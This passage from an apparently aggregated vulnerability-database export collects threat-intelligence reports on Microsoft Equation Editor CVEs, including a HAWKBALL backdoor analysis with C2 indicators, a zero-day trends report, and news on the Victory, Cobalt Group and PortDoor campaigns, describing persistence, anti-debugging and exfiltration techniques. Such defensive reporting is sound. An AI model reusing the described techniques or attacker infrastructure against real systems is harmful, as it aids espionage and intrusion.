19: Retrieve value from PEB\n\n##### NtQueryInformationProcess\n\nThe malware uses the NtQueryInformationProcess API to detect if it is being debugged. The following flags are used:\n\n * Passing value 0x7 to ProcessInformationClass:\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/HAWKBALL/Picture20.png) \nFigure 20: ProcessDebugPort verification\n\n * Passing value 0x1E to ProcessInformationClass:\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/HAWKBALL/Picture21.png) \nFigure 21: ProcessDebugFlags verification\n\n * Passing value 0x1F to ProcessInformationClass:\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/HAWKBALL/Picture22.png) \nFigure 22: ProcessDebugObject\n\n#### Conclusion\n\nHAWKBALL is a new backdoor that provides features attackers can use to collect information from a victim and deliver new payloads to the target. At the time of writing, the FireEye Multi-Vector Execution (MVX) engine is able to recognize and block this threat. We advise that all industries remain on alert, though, because the threat actors involved in this campaign may eventually broaden the scope of their current targeting.\n\n#### Indicators of Compromise (IOC)\n\n**MD5**\n\n| \n\n**Name** \n \n---|--- \n \nAC0EAC22CE12EAC9EE15CA03646ED70C\n\n| \n\nDoc.rtf \n \nD90E45FBF11B5BBDCA945B24D155A4B2\n\n| \n\nhh14980443.wll \n \n#### Network Indicators\n\n * 149.28.182[.]78:443\n * 149.28.182[.]78:80\n * http://149.28.182[.]78/?t=0&&s=0&&p=wGH^69&&k=<tick_count>\n * http://149.28.182[.]78/?e=0&&t=0&&k=<tick_count>\n * http://149.28.182[.]78/?e=0&&t=<int_xor_key>&&k=<tick_count>\n * Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)\n\n#### FireEye Detections\n\n**MD5**\n\n| \n\n**Product**\n\n| \n\n**Signature**\n\n| \n\n**Action** \n \n---|---|---|--- \n \nAC0EAC22CE12EAC9EE15CA03646ED70C\n\n| \n\nFireEye Email Security\n\nFireEye Network Security\n\nFireEye Endpoint Security\n\n| \n\nFE_Exploit_RTF_EQGEN_7\n\nExploit.Generic.MVX\n\n| \n\nBlock \n \nD90E45FBF11B5BBDCA945B24D155A4B2\n\n| \n\nFireEye Email Security\n\nFireEye Network Security\n\nFireEye Endpoint Security\n\n| \n\nMalware.Binary.Dll\n\nFE_APT_Backdoor_Win32_HawkBall_1\n\nAPT.Backdoor.Win.HawkBall\n\n| \n\nBlock \n \n#### Acknowledgement\n\nThank you to Matt Williams for providing reverse engineering support.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-06-05T15:00:00", "type": "fireeye", "title": "Government Sector in Central Asia Targeted With New HAWKBALL Backdoor\nDelivered via Microsoft Office Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2019-06-05T15:00:00", "id": "FIREEYE:ECB192E6133008E243C5B5CB25D9C6DD", "href": "https://www.fireeye.com/blog/threat-research/2019/06/government-in-central-asia-targeted-with-hawkball-backdoor.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-30T08:30:41", "description": "_One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization\u2019s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations._\n\nFireEye Mandiant Threat Intelligence documented more zero-days exploited in 2019 than any of the previous three years. While not every instance of zero-day exploitation can be attributed to a tracked group, we noted that a wider range of tracked actors appear to have gained access to these capabilities. Furthermore, we noted a significant increase over time in the number of zero-days leveraged by groups suspected to be customers of companies that supply offensive cyber capabilities, as well as an increase in zero-days used against targets in the Middle East, and/or by groups with suspected ties to this region. Going forward, we are likely to see a greater variety of actors using zero-days, especially as private vendors continue feeding the demand for offensive cyber weapons.\n\n#### Zero-Day Usage by Country and Group\n\nSince late 2017, FireEye Mandiant Threat Intelligence noted a significant increase in the number of zero-days leveraged by groups that are known or suspected to be customers of private companies that supply offensive cyber tools and services. Additionally, we observed an increase in zero-days leveraged against targets in the Middle East, and/or by groups with suspected ties to this region.\n\n![zero-day-money](https://www.fireeye.com/sites/default/files/inline-images/zero-day-money1.png)\n\nExamples include:\n\n * A group described by researchers as [Stealth Falcon](<https://citizenlab.ca/2016/05/stealth-falcon/> \"https://citizenlab.ca/2016/05/stealth-falcon/\" ) and [FruityArmor](<https://www.securityweek.com/windows-zero-day-exploited-fruityarmor-sandcat-threat-groups> \"https://www.securityweek.com/windows-zero-day-exploited-fruityarmor-sandcat-threat-groups\" ) is an espionage group that has reportedly [targeted journalists and activists in the Middle East](<https://www.welivesecurity.com/2019/09/09/backdoor-stealth-falcon-group/>). In 2016, this group used malware sold by NSO group, which leveraged three iOS zero-days. From 2016 to 2019, this group used more zero-days than any other group.\n * The activity dubbed SandCat in open sources, suspected to be linked to [Uzbekistan state intelligence](<https://www.vice.com/en_us/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec>), has been observed using zero-days in operations against targets in the Middle East. This group may have acquired their zero-days by purchasing malware from private companies such as NSO group, as the zero-days used in SandCat operations were also used in Stealth Falcon operations, and it is unlikely that these distinct activity sets independently discovered the same three zero-days.\n * Throughout 2016 and 2017, activity referred to in open sources as [BlackOasis](<https://www.securityweek.com/middle-east-group-uses-flash-zero-day-deliver-spyware>), which also primarily targets entities in the Middle East and likely acquired at least one zero-day in the past from [private company Gamma Group](<https://www.cyberscoop.com/middle-eastern-hacking-group-using-finfisher-malware-conduct-international-espionage/>), demonstrated similarly frequent access to zero-day vulnerabilities.\n\nWe also noted examples of zero-day exploitation that have not been attributed to tracked groups but that appear to have been leveraged in tools provided by private offensive security companies, for instance:\n\n * In 2019, a zero-day exploit in WhatsApp (CVE-2019-3568) was [reportedly used to distribute spyware](<https://www.itpro.co.uk/spyware/33632/whatsapp-call-hack-installs-spyware-on-users-phones>) developed by NSO group, an Israeli software company.\n * FireEye analyzed activity targeting a Russian healthcare organization that leveraged a 2018 Adobe Flash zero-day (CVE-2018-15982) that may be linked to leaked source code of Hacking Team.\n * Android zero-day vulnerability CVE-2019-2215 was [reportedly being exploited in the wild](<https://thehackernews.com/2019/10/android-kernel-vulnerability.html>) in October 2019 by NSO Group tools.\n\n_Zero-Day Exploitation by Major Cyber Powers_\n\nWe have continued to see exploitation of zero days by espionage groups of major cyber powers.\n\n * According to researchers, the Chinese espionage group APT3 exploited CVE-2019-0703 in [targeted attacks in 2016](<https://www.symantec.com/blogs/threat-intelligence/buckeye-windows-zero-day-exploit>).\n * FireEye observed North Korean group APT37 conduct a 2017 campaign that leveraged Adobe Flash vulnerability CVE-2018-4878. This group has also demonstrated an increased capacity to quickly exploit vulnerabilities shortly after they have been disclosed.\n * From December 2017 to January 2018, we observed multiple Chinese groups leveraging CVE-2018-0802 in a campaign targeting multiple industries throughout Europe, Russia, Southeast Asia, and Taiwan. At least three out of six samples were used before the patch for this vulnerability was issued.\n * In 2017, Russian groups APT28 and Turla leveraged multiple zero-days in Microsoft Office products. \n\nIn addition, we believe that some of the most dangerous state sponsored intrusion sets are increasingly demonstrating the ability to quickly exploit vulnerabilities that have been made public. In multiple cases, groups linked to these countries have been able to weaponize vulnerabilities and incorporate them into their operations, aiming to take advantage of the window between disclosure and patch application. \n\n_Zero-Day Use by Financially Motivated Actors_\n\nFinancially motivated groups have and continue to leverage zero-days in their operations, though with less frequency than espionage groups.\n\nIn May 2019, we reported that FIN6 used a Windows server 2019 use-after-free zero-day (CVE-2019-0859) in a targeted intrusion in February 2019. Some evidence suggests that the group may have used the exploit since August 2018. While open sources have suggested that the group potentially acquired the zero-day from criminal underground actor \"[BuggiCorp](<https://www.ibtimes.com/hacker-selling-windows-zero-days-worlds-most-dangerous-hacker-groups-2789374>),\" we have not identified direct evidence linking this actor to this exploit's development or sale.\n\n#### Conclusion\n\nWe surmise that access to zero-day capabilities is becoming increasingly commodified based on the proportion of zero-days exploited in the wild by suspected customers of private companies. Possible reasons for this include:\n\n * Private companies are likely creating and supplying a larger proportion of zero-days than they have in the past, resulting in a concentration of zero-day capabilities among highly resourced groups.\n * Private companies may be increasingly providing offensive capabilities to groups with lower overall capability and/or groups with less concern for operational security, which makes it more likely that usage of zero-days will be observed.\n\nIt is likely that state groups will continue to support internal exploit discovery and development; however, the availability of zero-days through private companies may offer a more attractive option than relying on domestic solutions or underground markets. As a result, we expect that the number of adversaries demonstrating access to these kinds of vulnerabilities will almost certainly increase and will do so at a faster rate than the growth of their overall offensive cyber capabilities\u2014provided they have the ability and will to spend the necessary funds.\n\nRegister today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in [vulnerability threats, trends and recommendations](<https://www.brighttalk.com/webcast/7451/392772>) in our upcoming April 30 webinar. \n\n_Sourcing Note: Some vulnerabilities and zero-days were identified based on FireEye research, Mandiant breach investigation findings, and other technical collections. This paper also references vulnerabilities and zero-days discussed in open sources including _[_Google Project Zero's zero-day \"In the Wild\" Spreadsheet_](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/view#gid=1123292625>)_. While we believe these sources are reliable as used in this paper, we do not vouch for the complete findings of those sources. Due to the ongoing discovery of past incidents, we expect that this research will remain dynamic._\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-04-06T00:00:00", "type": "fireeye", "title": "Zero-Day Exploitation Increasingly Demonstrates Access to Money, Rather than Skill \u2014 Intelligence for Vulnerability Management, Part One", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0802", "CVE-2018-15982", "CVE-2018-4878", "CVE-2019-0703", "CVE-2019-0859", "CVE-2019-2215", "CVE-2019-3568"], "modified": "2020-04-06T00:00:00", "id": "FIREEYE:A819772457030262D1150428E2B4438C", "href": "https://www.fireeye.com/blog/threat-research/2020/04/zero-day-exploitation-demonstrates-access-to-money-not-skill.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2023-05-27T15:17:54", "description": "Microsoft Office contains a memory corruption vulnerability due to the way objects are handled in memory. Successful exploitation allows for remote code execution in the context of the current user. This vulnerability is known to be chained with CVE-2018-0802.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Office Memory Corruption Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2018-0798", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T15:17:54", "description": "Microsoft Office contains a memory corruption vulnerability due to the way objects are handled in memory. Successful exploitation allows for remote code execution in the context of the current user. This vulnerability is known to be chained with CVE-2018-0798.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Office Memory Corruption Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2018-0802", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-06-07T19:08:25", "description": "An ongoing surveillance operation has been uncovered that targets a Southeast Asian government, researchers said \u2013 using a previously unknown espionage malware.\n\nAccording to Check Point Research, the attack involves spear-phishing emails with malicious Word documents to gain initial access, along with the exploitation of older, known Microsoft Office security vulnerabilities. But most notable, researchers said, is the novel backdoor, which they said has been in development by a Chinese APT for at least three years.\n\nThe documents were \u201csent to different employees of a government entity in Southeast Asia,\u201d according to [the Check Point analysis](<https://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/>). \u201cIn some cases, the emails are spoofed to look like they were from other government-related entities. The attachments to these emails are weaponized copies of legitimate looking official documents and use the remote template technique to pull the next stage from the attacker\u2019s server.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe malicious documents download a template from various URLs, according to the analysis, which are .RTF files embedded with the [RoyalRoad weaponizer](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>), also known as the 8.t Dropper/RTF exploit builder. RoyalRoad is a tool that researchers have said is [part of the arsenal of several Chinese APTs](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>), such as Tick, Tonto Team and TA428; it generates weaponized RTF documents that exploit vulnerabilities in Microsoft\u2019s [Equation Editor](<https://threatpost.com/threatlist-microsoft-macros-remain-top-vector-for-malware-delivery/137428/>) (CVE-2017-11882, CVE-2018-0798 and CVE-2018-0802).\n\nThe RoyalRoad-generated RTF document contains an encrypted payload and shellcode, according to the analysis.\n\n\u201cTo decrypt the payload from the package, the attacker uses the RC4 algorithm with the key 123456, and the resulted DLL file is saved as 5.t in the %Temp% folder,\u201d researchers said. \u201cThe shellcode is also responsible for the persistence mechanism \u2013 it creates the scheduled task named Windows Update that should run the exported function StartW from 5.t with rundll32.exe, once a day.\u201d\n\nThe .DLL gathers data on the victim\u2019s computer including the OS name and version, user name, MAC addresses of networking adapters and antivirus information. All of the data is encrypted and then sent to the attackers\u2019 command-and-control server (C2) via [GET HTTP request method](<https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/GET>). After that, a multi-stage chain eventually results in the installation of the backdoor module, which is called \u201cVictory.\u201d It \u201cappears to be a custom and unique malware,\u201d according to Check Point.\n\n## **Victory Backdoor**\n\nThe malware is built to steal information and provide consistent access to the victim. Check Point researchers said it can take screenshots, manipulate files (including creating, deleting, renaming and reading them), gather information on the top-level windows that are open, and shut down the computer.\n\nInterestingly, the malware appears to be related to previously developed tools.\n\n\u201cSearching for files similar to the final backdoor in the wild, we encountered a set of files that were submitted to VirusTotal in 2018,\u201d according to the analysis. \u201cThe files were named by the author as MClient and appear to be part of a project internally called SharpM, according to their PDB paths. Compilation timestamps also show a similar timeframe between July 2017 and June 2018, and upon examination of the files, they were found to be older test versions of our VictoryDll backdoor and its loaders chain.\u201d\n\nThe specific implementation of the main backdoor functionality is identical; and, the connection method has the same format, according to the firm. Also, MClient\u2019s connection XOR key and VictoryDll\u2019s initial XOR key are the same.\n\nHowever, there are differences between the two in terms of architecture, functionality and naming conventions. For instance, MClient features a keylogger, which is absent for Victory. And, Victory\u2019s exported function is named MainThread, while in all versions of the MClient variant the export function was named GetCPUID, according to Check Point.\n\n\u201cOverall, we can see that in these three years, most of the functionality of MClient and AutoStartup_DLL was preserved and split between multiple components \u2013 probably to complicate the analysis and decrease the detection rates at each stage,\u201d the form said. \u201cWe may also assume that there exist other modules based on the code from 2018 that might be installed by the attacker in the later stages of the attack.\u201d\n\n## **Attribution**\n\nCheck Point has attributed the campaign to a Chinese APT. One of the clues is that the first-stage C2 servers are hosted by two different cloud services, located in Hong Kong and Malaysia. These are active in only a limited daily window, returning payloads only from 01:00 \u2013 08:00 UTC Monday through Friday, which corresponds with the Chinese workday. Also, Check Point said that the servers went dormant in the period between May 1 and 5 \u2013 which China\u2019s Labor Day holidays.\n\nOn top of that, the RoyalRoad RTF exploit building kit is a tool of choice among Chinese APT groups; and some test versions of the backdoor contained internet connectivity check with www.baidu.com \u2013 a popular Chinese website.\n\n\u201cWe unveiled the latest activity of what seems to be a long-running Chinese operation that managed to stay under the radar for more than three years,\u201d Check Point concluded. \u201cIn this campaign, the attackers utilized the set of Microsoft Office exploits and loaders with anti-analysis and anti-debugging techniques to install a previously unknown backdoor.\u201d\n\n**Join Threatpost for \u201cA Walk On The Dark Side: A Pipeline Cyber Crisis Simulation\u201d\u2013 a LIVE interactive demo on **[**Wed, June 9 at 2:00 PM EDT**](<https://threatpost.com/webinars/take-a-walk-on-the-darkside/?utm_source=ART&utm_medium=ART&utm_campaign=June_ImmersiveLabs_Webinar>)**. Sponsored by Immersive Labs, find out whether you have the tools and skills to prevent a Colonial Pipeline-style attack on your organization. Questions and LIVE audience participation encouraged. Join the discussion and **[**Register HERE**](<https://threatpost.com/webinars/take-a-walk-on-the-darkside/?utm_source=ART&utm_medium=ART&utm_campaign=June_ImmersiveLabs_Webinar>)** for free.**\n", "cvss3": {}, "published": "2021-06-07T18:49:44", "type": "threatpost", "title": "Novel 'Victory' Backdoor Spotted in Chinese APT Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-06-07T18:49:44", "id": "THREATPOST:616358A88F9C1E69920585FDC717CF1F", "href": "https://threatpost.com/victory-backdoor-apt-campaign/166700/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T05:52:39", "description": "Evidence has surfaced that the Cobalt Group \u2013 the threat actors behind widespread attacks on banks and ATM jackpotting campaigns across Europe \u2013 is continuing to operate, despite the arrest of its accused ringleader in March.\n\nThe Cobalt Group, first burst on the scene in 2016: in a single night, the group stole the equivalent of over $32,000 (in local currency) from six ATMs in Eastern Europe. Throughout 2017 the group expanded its focus to financial-sector phishing schemes and new regions, including North and South America, as well as Western Europe. researchers estimated that in the first six months of 2017 Cobalt sent phishing messages with malicious attachments to over 3,000 users at 250 companies in 13 countries.\n\nIn a report [released last week](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) (PDF) by Positive Technologies, researchers there said in mid-May 2018 they detected a phishing campaign directed at the financial sector that has an ultimate goal of downloading a JavaScript backdoor on target\u2019s computers. Researchers discovered the backdoor to be loaded up with malevolent functions, including cyberespionage and the ability to launch programs, along with the ability to update itself, remove itself and detect antivirus software. It also encrypts its communications with the C2 server with RC4. In all, it\u2019s capabilities mirror the backdoor that Cobalt Group has been known to employ in the past, researchers said.\n\n\u201cAlthough [Positive Technologies] specialists did not detect use of the Cobalt Strike tool which gave the group its name, the techniques and tactics are strongly suggestive of the group\u2019s previous attacks,\u201d they noted.\n\nCobalt typically employs a number of techniques to evade user scrutiny and spam filters. The group hacks weakly protected public sites, which it uses to host malware. It sends fake messages that appear to come from financial regulators and company partners, and targets both work and personal addresses of employees. In most cases, the goal of phishing messages is to compromise bank systems used for ATM management. This enables infecting ATMs with malware that takes control of the cash dispenser. During the final stage of the attack, money mules collect cash from the hacked ATMs.\n\nThe new May campaign bore all of the hallmarks of the group beyond just the payload. For one, the phony messages were sent from a domain whose structure is identical to those previously used by the bad actors. These messages also have a link that points to a malicious document weaponized with three exploits for remote code execution in Microsoft Word (CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802), generated by the Threadkit exploit kit. This kill chain is the same as that of a Cobalt Group campaign detected in February.\n\n\u201cCobalt relies on social engineering for the first stage of attacks, and for good reason: almost 30 percent of recipients click links in phishing messages, as our statistics show,\u201d explained Andrew Bershadsky, PT CTO, adding that in 27 percent of cases, recipients click links in phishing messages. Attackers are often able to draw employees into correspondence (and even security staff, in 3 percent of cases). And if a message is sent from the address of a real company (a technique used by Cobalt), attackers\u2019 success rate jumps to 33 percent.\n\nAs for how the rest of the May attack unfolded, PT security researchers [said](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) that once one of the exploits is triggered, a BAT script runs that launches a [standard Windows utility](<https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/>) that allows bypassing AppLocker, as well as downloading and running SCT or COM objects using the standard Windows utility regsvr32.exe. The utility in turn downloads the COM-DLL-Dropper, which then fetches the backdoor.\n\nThe resurgence is notable given that the Spanish National Police [arrested](<https://www.tripwire.com/state-of-security/latest-security-news/cobalt-carbanak-malware-group-leader-arrested-spain/>) the Cobalt Group\u2019s leader (also behind the Carbanak gang) on March 26. EUROPOL said that the individual was responsible for helping to attack 100 financial institutions worldwide and cause more than 1 billion EUR in damages.\n", "cvss3": {}, "published": "2018-05-28T12:21:42", "type": "threatpost", "title": "Despite Ringleader\u2019s Arrest, Cobalt Group Still Active", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"], "modified": "2018-05-28T12:21:42", "id": "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "href": "https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-30T19:38:25", "description": "A previously undocumented backdoor malware, dubbed PortDoor, is being used by a probable Chinese advanced persistent threat actor (APT) to target the Russian defense sector, according to researchers.\n\nThe Cybereason Nocturnus Team observed the cybercriminals specifically going after the Rubin Design Bureau, which designs submarines for the Russian Federation\u2019s Navy. The initial target of the attack was a general director there named Igor Vladimirovich, researchers said, who received a phishing email.\n\n[![zoho webinar promo](https://media.threatpost.com/wp-content/uploads/sites/103/2021/04/29074106/Zoho_Webinar_Promo.png)](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\nThe attack began with the [RoyalRoad weaponizer](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>), also known as the 8.t Dropper/RTF exploit builder \u2013 a tool that Cybereason said is [part of the arsenal of several Chinese APTs](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>), such as Tick, Tonto Team and TA428. RoyalRoad generates weaponized RTF documents that exploit vulnerabilities in Microsoft\u2019s [Equation Editor](<https://threatpost.com/threatlist-microsoft-macros-remain-top-vector-for-malware-delivery/137428/>) (CVE-2017-11882, CVE-2018-0798 and CVE-2018-0802).\n\nThe use of RoyalRoad is one of the reasons the company believes Chinese cybercriminals to be behind the attack.\n\n\u201cThe accumulated evidence, such as the infection vector, social-engineering style, use of RoyalRoad against similar targets, and other similarities between the newly discovered backdoor sample and other known Chinese APT malware, all bear the hallmarks of a threat actor operating on behalf of Chinese state-sponsored interests,\u201d according to a [Cybereason analysis](<https://www.cybereason.com/blog/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector>), published Friday.\n\n## **A Quiet Espionage Malware**\n\nThe RoyalRoad tool was seen fetching the unique PortDoor sample once the malicious RTF document is opened, which researchers said was designed with stealth in mind. It has multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation, static detection antivirus evasion, one-byte XOR encryption, AES-encrypted data exfiltration and more.\n\nOnce executed, the backdoor decrypts the strings using a hardcoded 0xfe XOR key in order to retrieve its configuration information. This includes the command-and-control (C2) server address, a victim identifier and some other minor information.\n\nThe malware then creates an additional file in %temp% with the hardcoded name \u201c58097616.tmp\u201d and writes the GetTickCount value multiplied by a random number to it: \u201cThis can be used as an additional identifier for the target, and also as a placeholder for the previous presence of this malware,\u201d researchers explained.\n\nAfter that, it establishes its C2 connection, which facilitates the transfer of data using TCP over raw sockets, or via HTTPS \u2013 with proxy support. At this point, Cybereason said that PortDoor also has the ability to achieve privilege escalation by stealing explorer.exe tokens.\n\nThen, the malware gathers basic PC info to be sent to the C2, which it bundles with a unique identifier, after which is awaits further instructions.\n\nThe C2 commands are myriad:\n\n * List running processes\n * Open process\n * Get free space in logical drives\n * Files enumeration\n * Delete file\n * Move file\n * Create process with a hidden window\n * Open file for simultaneous operations\n * Write to file\n * Close handle\n * Open file and write directly to disk\n * Look for the \u201cKr*^j4\u201d string\n * Create pipe, copy data from it and AES encrypt\n * Write data to file, append with \u201c\\n\u201d\n * Write data to file, append with \u201cexit\\n\u201d\n\nPortDoor also employs an anti-analysis technique known as dynamic API resolving, according to the analysis.\n\n\u201cThe backdoor is able to hide most of its main functionality and avoid static detection of suspicious API calls by dynamically resolving its API calls instead of using static imports,\u201d researchers explained.\n\n## **Chinese APTs in the Cyberattack Mix \u2013 Probably**\n\nCybereason\u2019s analysis did not yield up a specific Chinese APT actor who would likely be responsible for the attack. However, the researchers said they could make some educated guesses.\n\n\u201cThere are a couple of known Chinese APT groups that share quite a few similarities with the threat actor behind the new malware samples analyzed,\u201d according to the report.\n\nFor instance, the RTF file used in the attack was weaponized with RoyalRoad v7, which was previously observed being used by the Tonto Team, TA428 and Rancor APTs.\n\n\u201cBoth the Tonto Team and TA428 threat actors have been observed attacking Russian organizations in the past, and more specifically attacking research and defense-related targets,\u201d according to the analysis. \u201cWhen comparing the spear-phishing email and malicious documents in these attacks with previously examined phishing emails and lure documents used by the Tonto Team to attack Russian organizations, there are certain similarities in the linguistic and visual style used by the attackers in the phishing emails and documents.\u201d\n\nThat said, the PortDoor malware doesn\u2019t share significant code similarities with previously known malware used by

Advanced Mobile Malware Campaign in India uses Malicious MDM - Part 2

Description

Related